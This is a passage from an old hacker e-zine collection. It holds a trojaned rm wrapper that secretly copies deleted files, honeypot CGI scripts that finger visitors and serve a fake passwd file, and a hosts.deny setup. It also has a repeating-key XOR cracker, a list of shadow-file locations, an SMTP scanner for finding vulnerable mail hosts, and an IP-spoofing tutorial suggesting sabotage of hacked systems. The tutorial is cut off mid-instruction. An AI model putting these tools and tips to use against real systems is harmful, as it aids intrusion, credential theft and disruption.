**argv) { struct stat filestats; int i; if (argc > 2) { if (strcmp("-i", argv[1])==0) goto interactive; if (strcmp("-f", argv[1])==0) goto force; if (strcmp("-v", argv[1])==0) goto verbose; if (strcmp("-r", argv[1])==0) goto recursive; if (strcmp("-rf", argv[1])==0) goto rf; if (strcmp("-ri", argv[1])==0) goto ri; if (strcmp("-rv", argv[1])==0) goto rv; if (strcmp("-rvf", argv[1])==0) goto rfv; if (strcmp("-rfv", argv[1])==0) goto rfv; if (strcmp("-Rvf", argv[1])==0) goto rfv; if (strcmp("-Rfv", argv[1])==0) goto rfv; if (strcmp("-frv", argv[1])==0) goto rfv; if (strcmp("-fvr", argv[1])==0) goto rfv; if (strcmp("-fRv", argv[1])==0) goto rfv; if (strcmp("-fvR", argv[1])==0) goto rfv; if (strcmp("-vfr", argv[1])==0) goto rfv; if (strcmp("-vrf", argv[1])==0) goto rfv; if (strcmp("-vfR", argv[1])==0) goto rfv; if (strcmp("-vRf", argv[1])==0) goto rfv; if (strcmp("-fr", argv[1])==0) goto rf; if (strcmp("-ir", argv[1])==0) goto ri; if (strcmp("-vr", argv[1])==0) goto rv; if (strcmp("--interactive", argv[1])==0) goto interactive; if (strcmp("--force", argv[1])==0) goto force; if (strcmp("--verbose", argv[1])==0) goto verbose; if (strcmp("--recursive", argv[1])==0) goto recursive; } else { setenv("PROGRAM", argv[1], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); system("/bin/rm.bak $PROGRAM"); unsetenv("PROGRAM"); } interactive: lstat(argv[2], &filestats); for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-i",argv[2],NULL); } else { setenv("PROGRAM", argv[2], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-i",argv[2],NULL); } } force: for (i=2;i/dev/null"); execl("/bin/rm.bak","rm","-f",argv[i],NULL); unsetenv("PROGRAM"); } verbose: for (i=2;i/dev/null"); execl("/bin/rm.bak","rm","-v",argv[i],NULL); unsetenv("PROGRAM"); } recursive: for (i=2;i/dev/null"); execl("/bin/rm.bak","rm","-r",argv[i],NULL); unsetenv("PROGRAM"); } rf: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-rf",argv[i],NULL); } else { setenv("PROGRAM", argv[i], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-rf",argv[i],NULL); } } ri: for (i=2;i/dev/null"); execl("/bin/rm.bak","rm","-ri",argv[i],NULL); unsetenv("PROGRAM"); } rv: for (i=2;i/dev/null"); execl("/bin/rm.bak","rm","-rv",argv[i],NULL); unsetenv("PROGRAM"); } rfv: for (i=2;i/dev/null"); execl("/bin/rm.bak","rm","-rfv",argv[i],NULL); unsetenv("PROGRAM"); } } This program can of course be improved, especially replacing the strcmp's with getopt() but I could care less.... Now when ever a user deletes something it will first be copied to /tmp/fill before it's deleted. Now, even though it's logged to /var/log/httpd/access_log, I'd like to know right away when someone tries to use the phf or test-cgi vulnerabilities on me. So I replaced the phf and test-cgi programs in my /cgi-bin/ with this. The first will get the info on who it is, then it will send a fake passwd file. This can be improved of course but I don't care to take the time. phf.c: /* ----------------------------------------------------- */ /* phf "trojan" by (--==+*~Shok~*+==--) */ /* ----------------------------------------------------- */ /* Email: shok@sekurity.org */ #include #include #include void main() { FILE *tmpfile, *fingerinfo; char *host, *addr, *browser, *query_string; char fingerbuf[2048]; host=getenv("REMOTE_HOST"); addr=getenv("REMOTE_ADDR"); browser=getenv("HTTP_USER_AGENT"); query_string=getenv("QUERY_STRING"); /* This is to prevent a finger war, the ip address below is my ip address */ /* just to be on the safe side. But I do have in.fingerd: LOCAL to allow */ /* me to finger without starting a finger war. */ if ((strcmp(addr, "206.71.69.243")) || (strcmp(addr,"127.0.0.1")) == 0) exit(0); system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo1"); tmpfile=fopen("/var/tmp/.phf", "w"); fingerinfo=fopen("/var/tmp/.fingerinfo1", "r"); fprintf(tmpfile, "The following person used phf!!\n\n"); fprintf(tmpfile, "\tHost: %s\n", host); fprintf(tmpfile, "\tAddress: %s\n", addr); fprintf(tmpfile, "\tBrowser type: %s\n", browser); fprintf(tmpfile, "\tQuery String (aka command entered): %s\n\n", query_string); fingerinfo=fopen("/var/tmp/.fingerinfo1", "r"); fgets(fingerbuf, 2047, fingerinfo); fclose(fingerinfo); fprintf(tmpfile, "I did a finger of the person trying to exploit us:\n"); fprintf(tmpfile, "--------------------------------------------------\n"); fputs(fingerbuf, tmpfile); fclose(tmpfile); system("mail -s \"SOMEONE USED phf!!\" root Query Results\n"); printf("

\n"); printf("/usr/local/bin/ph -m alias=x \n"); printf("cat /etc/passwd\n"); printf("

\n");
printf("root:TQoabYuFUSoSk:0:1:Operator:/:/bin/csh\n");
printf("nobody:*:65534:65534::/:\n");
printf("daemon:*:1:1::/:\n");
printf("sys:*:2:2::/:/bin/csh\n");
printf("bin:*:3:3::/bin:\n");
printf("uucp:*:4:8::/var/spool/uucppublic:\n");
printf("news:*:6:6::/var/spool/news:/bin/csh\n");
printf("ingres:*:7:7::/usr/ingres:/bin/csh\n");
printf("mail:*:8:12::/:\n");
printf("johnny:Abx4dgSg:MaTr|x:/home/MaTrix:/bin/sh\n");
printf("audit:*:9:9::/etc/security/audit:/bin/csh\n");
printf("sync::1:1::/:/bin/sync\n");
printf("kill8r:AfBs45Syf:100:25:Siko:/home/Siko:/bin/sh\n");
printf("ppp::70:70:PPP login:/tmp:/etc/ppplogin\n");
printf("sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag\n");
printf("sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag\n");
printf("ftp:*:10:20:ftp:/home/ftp:/usr/bin/bash\n");
printf("luseruser:xAFjgodjFa4:254:100:Pr0t0:/home/Pr0t0c0l:/bin/sh\n");
printf("babum:aDtg3Gs645:BiT-#hacker:454:100:/home/BiT:/bin/sh\n");
printf("www:*:30:30:World Wide Web:/home/www:/usr/bin/bash\n");
printf("pop:*:70:70:Post Office Protocol:/var/spool/pop:/usr/bin/bash\n");
printf("zirzlaff:.a6RPNtUhGW0k:3190:100:Torsten Zirzlaff:/home/tz:/usr/local/bin/tcsh\n");
printf("f33r:A23gAdcYf5:4110:100:f33r me bitch:/home/hph:/usr/local/bin/tcsh\n");
printf("henrik:v50YvKjFwWw.M:4120:18:HeNriK:/usr/sirius/henrik:/usr/bin/bash\n");
printf("inas:fStcY3^gf:8900:100:InaSaLoser:/home/is:/usr/local/bin/tcsh\n");
printf("ivo:*:8920:100:Da Tru hacker-Lamer:/home/ivo:/usr/local/bin/tcsh\n");
printf("pcguest::7454:100:Temp hax0r account:/tmp:/usr/bin/sh\n");
printf("simone:Em8y0pwT.5umo:8930:100:Simone Kleine:/home/simone:/usr/bin/bash\n");
printf("shko:aDrsBsefYr:666:100:SHLRP:/home/shok:/bin/bash\n");
printf("majordomo:*:405:20:Majordomo server:/dev/null:/bin/startdomo\n");
printf("listserv:*:567:20:Listserv server:/dev/null:/bin/sh\n");
printf("hammer:FwhX26Hf1:8940:100:Peter Hammerstein:/home/hammer:/usr/bin/bash\n");
printf("patrick:cYz7MXTIyGByQ:8950:100:Patrick Mergell:/home/patrick:/usr/bin/bash\n");
printf("chr:T/SRcchg0fK3I:8960:100:Christian Zemlin:/home/chr:/usr/bin/bash\n");
printf("db:*:8970:100:Dieter Beule:/usr/sirius/dieter:/usr/bin/bash\n");
printf("guest:AefxF2a2D:8999:110:Guest:/home/guest:/usr/local/bin/tcsh\n");
printf("
"); } This is what the above will show up in the root's mail: The following person used phf!! Host: ts037d12.chi-il.concentric.net Address: 206.173.188.168 User (if able): (null) Ident (if able): (null) Browser type: (null) Query String (aka command entered): Qalias=X%0aid I did a finger of the person trying to exploit us: -------------------------------------------------- [206.173.188.168] (probably Win95 which is why there was no output as Win95 doesn't have an actual "finger" program) Now for the test-cgi...this does the same thing accept it will send a "File Not found" instead: test-cgi.c: /* --------------------------------------------------- */ /* test-cgi.c -- test-cgi "trojan" by --==+*~Shok~+*-- */ /* --------------------------------------------------- */ /* Email: shok@sekurity.org */ #include #include #include void main(void) { FILE *tmpfile, *fingerinfo; char *host *addr, *browser, *query_string; char fingerbuf[2048]; host=getenv("REMOTE_HOST"); addr=getenv("REMOTE_ADDR"); browser=getenv("HTTP_USER_AGENT"); query_string=getenv("QUERY_STRING"); /* This is to prevent a finger war, for safety, even though you SHOULD */ /* have in.fingerd: LOCAL in your hosts.allow */ if ((strcmp(addr, "206.71.69.243")) || (strcmp(addr,"127.0.0.1")) == 0) exit(0); system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo"); tmpfile=fopen("/var/tmp/.test-cgi", "w"); fprintf(tmpfile, "The following person used phf:\n\n"); fprintf(tmpfile, "\tHost: %s\n", host); fprintf(tmpfile, "\tAddress: %s\n", addr); fprintf(tmpfile, "\tBrowser type: %s\n ", browser); fprintf(tmpfile, "\tQuery String (aka command entered): %s\n\n", query_string); fingerinfo=fopen("/var/tmp/.fingerinfo", "r"); fgets(fingerbuf, 2047, fingerinfo); fclose(fingerinfo); fprintf(tmpfile, "I did a finger of the person trying to exploit us:\n"); fprintf(tmpfile, "--------------------------------------------------\n"); fputs(fingerbuf, tmpfile); fclose(tmpfile); /* REPLACE THIS PART WITH WHO YOU WANT TO MAIL IT TO change the root to */ /* to whatever you want */ system("mail -s \"SOMEONE USED test-cgi!!\" root < /var/tmp/.test-cgi"); unlink("/var/tmp/.fingerinfo"); unlink("/var/tmp/.test-cgi"); printf("Content-type: text/html\n\n"); printf("

File Not found\n

"); printf("The requested URL /cgi-bin/test-cgi was not found on this server."); } Just as an added bonus here......... When someone goes to a directory you have .htaccess in, it will send 401, which is the unauthorized error code (pretty sure it's 401 but not in the mood to check). Now I editted my srm.conf (usually /usr/local/etc/httpd/conf/srm.conf), and added this line: ErrorDocument 401 /cgi-bin/unauthorized.cgi This is basically like the one above.......except it differs by the the 'user' part, which lets you know what user it was...this is a good way to know if there is an unauthorized attempt, and/or what user is logging into your webpage that is secured...... unauthorized.c: /* -------------------------------------------------------- */ /* Unauthorized cgi "trojan" script by (--==+*~Shok~*+==--) */ /* -------------------------------------------------------- */ /* Email: shok@sekurity.org */ #include #include #include void main(void) { FILE *tmpfile, *fingerinfo; char *host, *addr, *user, *ident, *browser, *query_string; char fingerbuf[2048]; host=getenv("REMOTE_HOST"); addr=getenv("REMOTE_ADDR"); user=getenv("REMOTE_USER"); ident=getenv("REMOTE_IDENT"); browser=getenv("HTTP_USER_AGENT"); query_string=getenv("QUERY_STRING"); /* This can get ugly */ if ((strcmp(addr, "206.71.69.243"))==0) exit(0); system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo"); tmpfile=fopen("/var/tmp/.unauthorized", "w"); fprintf(tmpfile, "The following person has unauthorized access:\n\n"); fprintf(tmpfile, "\tHost: %s\n", host); fprintf(tmpfile, "\tAddress: %s\n", addr); fprintf(tmpfile, "\tUser (if able): %s\n", user); fprintf(tmpfile, "\tIdent (if able): %s\n", ident); fprintf(tmpfile, "\tBrowser type: %s\n ", browser); fingerinfo=fopen("/var/tmp/.fingerinfo", "r"); fgets(fingerbuf, 2047, fingerinfo); fclose(fingerinfo); fprintf(tmpfile, "I did a finger of the person:\n"); fprintf(tmpfile, "-----------------------------\n"); fputs(fingerbuf, tmpfile); fclose(tmpfile); system("mail -s \"Somone tried unauthorized access\" root Unauthorized"); printf("

Unauthorized

"); printf("You are unauthorized and unwanted here.\n Go away d0rk

"); printf(""); } Here is my hosts.deny too.........in case you wanted to see it ;) ALL: .cc.edu: /bin/mail -s "%h from CC.EDU tried to access us!!" root ALL: .gov, .mil: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "GOV/MIL ATTEMPTED ACCESS from %h!! Using %s." root & in.telnetd: ALL: /bin/mail -s "%h tried to telnet in" root #FINGER - Noisy people #------------ in.fingerd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FINGER ATTEMPT FROM %h" root & #Security reasons #--------------- in.ftpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FTP ATTEMPT FROM %h" root & in.rlogind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RLOGIN ATTEMPT FROM %h" root & #in.telnetd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "TELNET ATTEMPT FROM %h" root & # PORTMAP #------------- portmap: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "PORTMAP ATTEMPT FROM %h. Using %s" root & #COMSAT in.comsat: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "COMSAT ATTEMPT FROM %h" root & #REXECD in.rexecd: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "REXEC ATTEMPT FROM %h" root & #RSHD in.rshd: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RSHD ATTEMPT FROM %h" root & #NNRPD in.nnrpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "NNRPD ATTEMPT FROM %h" root & #RPCBIND rpcbind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RPCBIND ATTEMPT FROM %h. Using %s" root & #ALL: paranoid Well.......................................we're winding down to the end. It has been fun and I don't have much more to say on this article. Thanks for reading, please feel free to use and distribute this, although I wish for you to leave my comments and "header" at the tops ... ya know my "copyright" :) You can access a few of my things at ftp.janova.org (in pub) or www.janova.org. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Cryptanalytic Attacks on Repeating Key Algorithms by The Messiah CONTENTS: * Introduction * Background * Methods Of Attack * BadCrypt v1.0 * GeneriCrack for DOS v1.0 * Prevention INTRODUCTION: Bruce Schneier published an essay called "Why Crypto Is Harder Than It Looks." It's true, designing a secure algorithm is MUCH harder than breaking one. This article is about breaking programs which use a repeating key. Credit should go out to Kent Briggs, whose WinCrack program opened doors for me into cryptanalysis. His code is also at the heart of GeneriCrack for DOS, altered quite a bit, however. BACKGROUND: What is cryptanalwhatever? Cryptanalysis is the art of decoding encrypted messages without the key, or algorithm. In 1994, PC Mag released a program by Jeff Prosise called WinCrypt. It created a 512-byte block derived from a passphrase, then XOR'd (eXclusive OR) each 512-byte block of the plaintext with the key block. |------Key Block-----| XOR |------Plaintext-----|--------------------|--------------------|--------------------| equals |-----Ciphertext-----| |------Key Block-----| XOR |--------------------|------Plaintext-----|--------------------|--------------------| equals |--------------------|-----Ciphertext-----| And so on, until the plaintext is completely XOR'd with the key block. The problem with this is that is you have a file of all 'A's (Ordinal value=65), there will be visible repeating patterns in the ciphertext- A PROBLEM! Why is that a problem, you ask? Someone would have to find that huge 512-byte key to decrypt it, right? Errnt. METHODS OF ATTACK: WinCrypt's weakness is that it uses the same key byte at known points in the file. The 1st, 513th, 1025th, 1537th, etc byte is always XOR'd with the same byte of the key. The other bytes in the key have no role in the encryption of the 1st byte. If the 1st byte of the file is an 'A', and they 1st byte in the key is a 'B', then the result will be a byte value of 3, regardless of what the other entries in the key are. So instead of a 512-byte key, it's actually 512 1-byte keys. The keyspace for a 512-byte key would be 2^4096 possibilities, but 512 1-byte keys is just 512*256 (number of entries) (number of values per entry). 131072 possible keys is quite a bit less to search. But we don't have to stop there. If we know some common byte values in the plaintext, we can search for those, like this: for i = 1 to 512 do begin for j = 0 to 255 do if (InBlock[i] xor j) is in CommonValues then Increment(Count[j]); end The highest count will be the byte that has the most hits inside the target byte range. Text files are made up of mostly spaces (ordinal value 32), CR/LF pairs (13/10), and lower case letters (well, some l33t0 ph|l3z might have different values, but hey...). BADYCRYPT v1.0: (* BadCrypt v1.0 by The Messiah This program takes a 256-byte array, fills it with the output of a PRNG seeded with the passphrase, then uses the aforementioned encryption method. *) program BadCrypt; uses Crt; type TKey = array[1..256] of byte; var key : TKey; passphrase, inpath, outpath : String; procedure Crypt(infile, outfile : String); var FromF, ToF: file; NumRead, NumWritten, I: Integer; Buf: array[1..256] of byte; begin Write('Crypting'); Assign(FromF, infile); Reset(FromF, 1); Assign(ToF, outfile); Rewrite(ToF, 1); repeat BlockRead(FromF, Buf, SizeOf(Buf), NumRead); for i := 1 to NumRead do Buf[i] := Buf[i] xor Key[i]; BlockWrite(ToF, Buf, NumRead, NumWritten); Write('.'); until (NumRead = 0) or (NumWritten <> NumRead); Close(FromF); Close(ToF); WriteLn('Done!'); end; procedure Expand(seed : String; var aKey : TKey); var I, J : Integer; begin Write('Expanding key'); for i := 1 to Length(seed) do begin RandSeed := Ord(seed[i]); for j := 1 to 256 do aKey[j] := aKey[j] xor Random(256); Write('.'); end; WriteLn('Done!'); end; begin WriteLn('BadCrypt v1.0: The Worst Encryption Utility!'); Write('Enter the password: '); ReadLn(passphrase); Write('Enter the filepath for the input file: '); ReadLn(inpath); Write('Enter the filepath for the output file: '); ReadLn(outpath); Expand(passphrase, Key); Crypt(inpath, outpath); WriteLn('Hit enter to quit...'); ReadLn; end. { ------------------------------------------------------ } GENERICRACK V1.0: (* GeneriCrack v1.0 for DOS by The Messiah This cracks files, if you know the key size it was encrypted with. A 32-bit version will be out soon, so stick around... *) program GeneriCrack; const MAXKEY = 1024; var key, buffer : array[1..MAXKEY] of Byte; count, maxcount : array[1..MAXKEY] of Integer; inpath, outpath : String; kSize : Integer; procedure Crack(Filename : String; keysize : Integer); var file1: file; i,j, result: integer; b : byte; begin Write('Cracking'); Assign(file1,Filename); Reset(file1,1); for i := 1 to KeySize do begin key[i] := 0; maxcount[i] := 0; end; for i:=0 to 255 do begin seek(file1,0); for j := 1 to KeySize do count[j] := 0; while not eof(file1) do begin blockread(file1,buffer,keysize,result); for j:=1 to result do begin b:= i xor buffer[j]; if b in [10,13,32,97..122] then count[j] := count[j] + 1; end; end; for j:=1 to keysize do if count[j]>maxcount[j] then begin key[j]:=i; maxcount[j]:=count[j]; end; Write('.'); end; WriteLn('Done!'); close(file1); end; procedure Decrypt(infile, outfile : String; keysize : Integer); var file1,file2: file; i,j, result: integer; begin Write('Decrypting'); assign(file1,infile); reset(file1,1); assign(file2,outfile); rewrite(file2,1); while not eof(file1) do begin blockread(file1,buffer,keysize,result); for j:=1 to result do buffer[j]:= buffer[j] xor key[j]; blockwrite(file2,buffer,result,i); Write('.'); end; close(file1); close(file2); WriteLn('Done!'); end; begin WriteLn('GeneriCrack for DOS v1.0 by The Messiah'); Write('Enter the keysize in bytes: '); ReadLn(kSize); Write('Enter the filepath of the input file: '); ReadLn(inpath); Write('Enter the filepath of the output file: '); ReadLn(outpath); Crack(inpath, kSize); WriteLn; Decrypt(inpath, outpath, kSize); WriteLn; WriteLn('Hit enter to quit...'); ReadLn; end. { ------------------------------------------------------ } PREVENTION: One way to make sure an algorithm you're designing (or using) isn't fallible to this particular attack is to make the encryption data-sensitive. Have the key change with each block. This will not, of course, make a bad algorithm good, but it will make it resistant to this particular attack. Also, if you're running a block cipher in ECB mode, it could be broken with this attack, AFAIK. I haven't tested it yet, but ECB does the same method for each block. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Shadow files explained by Shypht Ok, a few people I knew / know were a bit confused on the purpose on having a shadowed password file so I decided to write a simple text explaining them. -[ ---------------------------------------------------------------------- ]- Û²±° Introduction : the basic's °±²Û -[ ---------------------------------------------------------------------- ]- A shadow file is a way of adding extra security to a unix machine. Before password shadowing, a passwd file would look like this : ( this is in /etc/passwd ) esmith:s920Vk02sl24:6151:100:Edmond Smith:/home/esmith:/bin/bash | | | | | | | | | | | | | \- which shell they | | | | | \- home dir use7 | | | | \- real name/comments/bussiness etc | | | \- group id (gid) | | \- user id(uid) | \- encrypted password \--- login name but now with computer security becoming more and more of an issue, and more and more people were grabing the /etc/passwd file and crack the encrypted password w/ a word list and a cracker like brute force or cracker jack, john the ripper,crack, etc. The reason why a wordlist/dictionary file is used is because the encrypted password uses a one-way hash. To crack the password, the cracker compares the one-way hash from each word in the word list to the encrypted password until a match is found. So they decided they needed more security, so they started to shadow their password files, they still look pretty much the same, but instead of having the encrypted password, there is a * in place, so if you were to cat /etc/passwd you'd get : ( location varies on systems see further down for more info ) esmith:*:6151:100:Edmond Smith:/home/esmith:/bin/bash ^- shadowed password file, not much use eh? people may wonder why wouldn't the system admins make the /etc/passwd read-only by root and it'd save them alot of hassle, but programs need to read certain info from that file to get user name / uid / gid etc, and since not all programs are run as root, if the /etc/passwd was read by root only, it would cause conflicts, and alot of programs would have to be run as root and create alot of security problems. So the actual encrypted password is held in the shadow file, for a list of locations see below, this file is / should only be read/write only by the root admins, this gives an extra ammount of security, and since only root can read it, normal users can't grab a copy and crack the password's in it. The format of the shadow file goes as : username:password:change_date:min_change:max_change:warn:inactive:expire: the format will go into more detail in the next section. -[ ---------------------------------------------------------------------- ]- Û²±° The Shadow File : The Format °±²Û -[ ---------------------------------------------------------------------- ]- As stated above the format of the shadow file goes as : username:password:change_date:min_change:max_change:warn:inactive:expire: User Name : the name of the user Password : the encrypted password. And/or alternate authontication methods wich will be explained in the next section. [ - the following fields relate to passwd change / expiration - ] Change Date : encodes the date of the most rescent passowrd chage Min/Max Change : tells the min and max days between password changes Warn : when the password is about to expire, warn that many days ahead of time Inactive : specifies how many days the user has to change thier pass after the expiration date before that account is cancled Expire : encodes the date that the password will expire -[ ---------------------------------------------------------------------- ]- Û²±° The Shadow File : Extra Features °±²Û -[ ---------------------------------------------------------------------- ]- ( I read some of this stuff in a document relating to linux security so I am not sure if it applys to all shadowing systems but I am pretty sure that it does / or at least should. If not it is still something that is interesting to know. ) In the password field of the shadow file you can also specify additional authentication programs to be run after the password has been entered. An example of one is : shypht:4j3jx70735;@/sbin/agetest:::::: the ;@/sbin/agetest would tell the system that after the password has been enter'd in correctly to run the /sbin/agetest program, which I just made up for an example, and it would return a 0 or 1 showing if the user passed shypht:<\@>/sbin/securelogin:::::: which the user would have to pass to gain entry to the system, and he/she would not be prompted for a password. This can be used for lower or higher security on a system, but I would imagine that it would only be used to secure the system even more, you could have them prompted for personal questions which only they would know etc. -[ ---------------------------------------------------------------------- ]- Û²±° The Shadow File : Locations °±²Û -[ ---------------------------------------------------------------------- ]- The location of the shadow file varies from system to system, I have taken this list from the ultimate beginers guide to hacking 97 revision. And is modified for this document. UNIX Path ------------------------------------------------- AIX 3 /etc/security/passwd or /tcb/auth/files// A/UX 3.0s /tcb/files/auth/?/* BSD4.3-Reno /etc/master.passwd ConvexOS 10 /etc/shadpw ConvexOS 11 /etc/shadow DG/UX /etc/tcb/aa/user/ EP/IX /etc/shadow HP-UX /.secure/etc/passwd IRIX 5 /etc/shadow Linux1.1 /etc/shadow OSF/1 /etc/passwd[.dir|.pag] SCO Unix #.2.x /tcb/auth/files// SunOS4.1+c2 /etc/security/passwd.adjunct SunOS 5.0 /etc/shadow System V Release 4.0 /etc/shadow System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] UNICOS /etc/udb Unix System V /etc/master.passwd -[ ---------------------------------------------------------------------- ]- Û²±° Closing Comments °±²Û -[ ---------------------------------------------------------------------- ]- I hope that this document helpfull to anyone out there. I wrote this to help people understand, and maybe learn abit more about the shadow file. Thanks for reading this far - shypht -[ ---------------------------------------------------------------------- ]- Û²±° The End °±²Û -[ ---------------------------------------------------------------------- ]- greetz out to : vacuum, cellular fear, philisopher, exorcist, atom, RM, severed, all my friends in #hackphreak, PentiumRU, Nyangel, Rloxley, X-Bish and all the other ops, and #carparts and anyone else I forgot thanx to vacuum for fixin some spelling and adding the 1way hash info. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ SMTP server scanner by memor /* Here is a SMTP server scanner (thoses ones on port25) to scan i guess for old mailserver, for easy sendmail bugs uses. well.. this is not really an hacking tool.. only a scanning one. it can be used in 2 ways.. USAGE: smtpscan -dh xxx.xxx[.xxx](if option -h) [port](optional) first.. to find "possible" hackable domains like that : smtpscan -d xxx.xxx or smtpscan -d xxx.xxx 25 will scan for smtp from xxx.xxx.1.1 to xxx.xxx.255.1 and 2ndly, it can be used to find "possible" hackable servers on a domain with : smtpscan -h xxx.xxx.xxx or smtpscan -h xxx.xxx.xxx 25 will scan for smtp from xxx.xxx.xxx.1 to xxx.xxx.xxx.255 *note* you can scan for any domains or servers with another port (like for pop3 or other) with smtpscan -dh xxx.xxx.xxx[.xxx] port thanx to Wintifax for his advices ;) memor@mygale.org memor(hbs) Aug 29, 1997 */ /* habitual includes for managing functions in the programm */ #include #include #include #include #include #include #include #include #include /* defining global variables for reading writing creating the socket */ FILE *soc; int sock; /* defining void answer(void) function */ void answer(); /* main routing */ int main(argc,argv) int argc; char **argv; { /* create variables for counting , ip adress string */ int count, port = 25; char *ips; struct sockaddr_in ip; ips = (char *)malloc(100); /* checking if enough arguments to make the programm working correctly */ if(argc<2) { /* if not, tells the usage and quit */ printf("%s - memor/hbs\n",argv[0]); printf("usage:\n"); printf("%s -dh xxx.xxx[.xxx] [port]\n",argv[0]); exit(1); } else if(argc>3) port = atoi(argv[3]); /* begining -d or -h scan */ for(count=1;count<256;count++) { if(strcmp(argv[1],"-d")==0) sprintf(ips,"%s.%i.1",argv[2],count); else sprintf(ips,"%s.%i",argv[2],count); printf("Looking at %s Port %i\n",ips,port); /* creating socket */ if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) /* i cant open it */ { /* i cant, i write what error it gives me */ perror("socket"); } else { soc=fdopen(sock, "r"); ip.sin_family = AF_INET; ip.sin_port = htons(port); ip.sin_addr.s_addr = inet_addr(ips); bzero(&(ip.sin_zero),8); /* trying to connect..reach the host */ if ( connect(sock, (struct sockaddr *)&ip, sizeof(struct sockaddr)) < 0 ) { /* i cant, i write what error it gives me */ perror("connect"); } else { /* getting what the smtp tells me */ answer(); } /* closing that socket */ close(sock); } } } /* answering function */ void answer() { /*creating a as char type.. */ char ch; do { ch=getc(soc); printf("%c",ch); /* i write the cararcter i received */ } while(ch!='\r'); /* received a 13 .. go back to main() */ printf("\n"); } ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ All About The Internet Protocol by Malhavoc Lets start off with the basics of ip's then we will start on some of the advanced stuff like ip spoofing and masquerading. First off Ip is short for Internet Protocol. The Internet Protocol defines how data should be broken down to be transmitted over the internet. Another part of the Internet Protocol is the Internet Protocol address or IP Address. The Ip address is a 32-bit number with 4 digits ranging from 0 to 255. The IP address is similar to your home address in that it is an identifier much like your home address, except that the ip address identifies each computer connected or linked to the internet. Ip addresses can be resolved to domain names and visa versa through DNS which stands for Domain Name Server or name server for short. Each domain has a unique IP address assigned to it. Ip can have multiple domain names assigned to it. The Ip address also has 4 layers associated with it. They are: The Application Layer - This deals with the functions of server applications like FTP and HTTP. The Transmission Control Protocol Layer - This controls the moving of data from the source to the destination ignoring everything else. The Internet Protocol Layer - This handles all of the moving data from one network node to the next. The Physical Layer - This controls all of the actual communications hardware such as ethernet cards and modems. These layers are known as the protocol stack. Without IPs you can't find any computer on the internet. Something else associated with the Ip is something called TCP or Transmission Control Protocol. This basically controls what the ip transmits and recieves to and from other computers. There are also 2 types of IPs. They are the Dynamic and the Static ip. The dynamic ip is an ip that always changes. Sometimes the last 2 digits are the same, but most of the time the last digit stays the same. The static ip on the otherhand is the same all of the time, hence the word static. As you can see the IP has many functions throughout the internet and if you mess around with them in the wrong way, you could certainly screw up many computers, even a whole network up. How do you do this you ask? READ ON! In the previous paragraph I said that if you fuck around with an IP or a computer that is connected to a very large LAN, Network, or Intranet you could really screw things up quite a bit. There are many ways of doing this. Some more fun than others. You could hack a system and crontab shutdown -h now to run every 15 minutes or nuke a server and lag it to hell, but that could totally cripple a system, and that is not what I like to condone. What I really like is spoofing. Although it does not screw up anything it can give you unauthorized access to things or you could just make your ip and/or domain to whatever you want. Spoofing is not very hard if you know what you are doing. If you read my explanation of the IP it explained all about IPs. If you remember everything that I explained it can help you in your quest to spoof, or you could continue to read this and learn how to spoof by my teachings. To do a basic spoof on IRC or something you just need root on a nameserver and jizz. In case you are saying, "What the hell is a nameserver?", I have included a quick little definition, if you will of a nameserver. A nameserver is pretty much a computer that translates the alphabetic domain name to a numerical IP address. To get root on a nameserver you either have to: a) Get unauthorized access to the system, anotherwards hack the system b) You already own a nameserver connected to the internet If you would like to use option "a" to get access, you need to find another file specifically written about hacking(which I am positive I will write at some point). or if you chose "b", can I get access?(it was a joke but if i can, e-mail me at malhavoc@xxedgexx.com) but seriously if you do have one, perfect. All you need to do now is download jizz. You could download it at my website at Http://Kaos.xxedgexx.com or go to Http://www.rootshell.com. Once you download it type gcc -o jizz jizz.c, after that, jizz should compile in the directory you download to. After the compilation is complete type 